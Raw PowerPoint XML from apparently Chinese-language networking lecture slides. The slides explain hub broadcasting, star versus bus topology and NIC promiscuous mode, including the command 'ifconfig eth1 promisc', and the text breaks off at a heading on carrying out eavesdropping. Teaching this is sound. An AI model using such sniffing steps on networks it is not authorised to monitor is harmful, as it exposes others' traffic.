            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>集线器－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本质：物理层中继器，信号放大，延长网络距离</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处理基本单位是位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>收到的位发送给所有其它连接节点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSMA/CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（载波监听多点接入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>碰撞检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）：由计算机的网卡检测冲突</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功放、小蜜蜂</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通信效率低</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9223"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5-</a:t>
            </a:r>
            <a:fld id="{38D46BCE-A2F1-4A15-9FB2-1BC160972F3F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11274" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4988570" y="1263650"/>
            <a:ext cx="3471862" cy="3576638"/>
            <a:chOff x="3573" y="796"/>
            <a:chExt cx="2187" cy="2253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11275" name="Group 5"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3573" y="1063"/>
              <a:ext cx="2187" cy="1706"/>
              <a:chOff x="1234" y="2136"/>
              <a:chExt cx="2608" cy="1982"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11280" name="Rectangle 6"/>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266" name="Object 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64910" name="Clip" r:id="rId4" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId4" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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64911" name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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64912" name="Clip" r:id="rId7" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId7" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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1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64913" name="Clip" r:id="rId8" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId8" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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1" name="Rectangle 11"/>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2" name="Rectangle 12"/>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3" name="Rectangle 13"/>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4" name="Rectangle 14"/>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5" name="Line 15"/>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6" name="Line 16"/>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7" name="Line 17"/>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8" name="Line 18"/>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9" name="Text Box 1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twisted pair</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11290" name="Line 20"/>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91" name="Text Box 2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hub</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11292" name="Line 22"/>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76" name="Text Box 2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A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11277" name="Text Box 2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B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11278" name="Text Box 2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C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11279" name="Text Box 2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D</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="云形标注 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7385124" y="1282503"/>
            <a:ext cx="1301675" cy="935827"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88404"/>
              <a:gd name="adj2" fmla="val 9837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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>广播</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18697154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3219">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="393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3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3219">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39321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3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3219">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39321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32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3219">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39321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3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3219">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39321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3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3219">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39321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32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898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5-</a:t>
            </a:r>
            <a:fld id="{B4C8EC36-2C5E-445C-BB5D-52DB2E0BC566}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242888" y="0"/>
            <a:ext cx="8901112" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>集线器内部逻辑结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="260350" y="1320800"/>
            <a:ext cx="5068888" cy="268605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Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="41275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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12299" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1674813"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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="290830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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4137025"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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="81280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AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2132013"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AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330835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AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4537075"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Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="450850" y="1554163"/>
            <a:ext cx="4699000" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>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4253" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531813" y="4368800"/>
            <a:ext cx="7083425" cy="2033588"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>集线器连接的网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>物理上是星型拓扑结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>逻辑上是总</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>线型拓扑结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>同时只能一个端口发送数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12308" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5732463" y="1066800"/>
            <a:ext cx="3471862" cy="3576638"/>
            <a:chOff x="3573" y="796"/>
            <a:chExt cx="2187" cy="2253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12309" name="Group 15"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3573" y="1063"/>
              <a:ext cx="2187" cy="1706"/>
              <a:chOff x="1234" y="2136"/>
              <a:chExt cx="2608" cy="1982"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12314" name="Rectangle 16"/>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290" name="Object 1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65930" name="Clip" r:id="rId3" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId3" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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1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65931" name="Clip" r:id="rId5" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId5" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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1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65932" name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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2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65933" name="Clip" r:id="rId7" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId7" imgW="1307263" imgH="1084139" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 9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5" name="Rectangle 21"/>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6" name="Rectangle 22"/>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7" name="Rectangle 23"/>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8" name="Rectangle 24"/>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9" name="Line 25"/>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0" name="Line 26"/>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1" name="Line 27"/>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2" name="Line 28"/>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3" name="Text Box 2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twisted pair</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12324" name="Line 30"/>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5" name="Text Box 3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hub</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12326" name="Line 32"/>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310" name="Text Box 3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A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12311" name="Text Box 3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B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12312" name="Text Box 3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C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12313" name="Text Box 3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D</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19231879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4253">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3942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4253">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3942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2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4253">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3942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2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4253">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39425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425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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网卡工作在数据链路层</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以帧为单位进行传输</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>帧头含目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址和源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>普通模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网卡只接收以自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址为目的数据包，并将其传递给操作系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“混杂”模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网卡将所有经过的数据包都传递给操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编程设置，或通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令设置：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ifconfig eth1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>promisc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实施监听</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
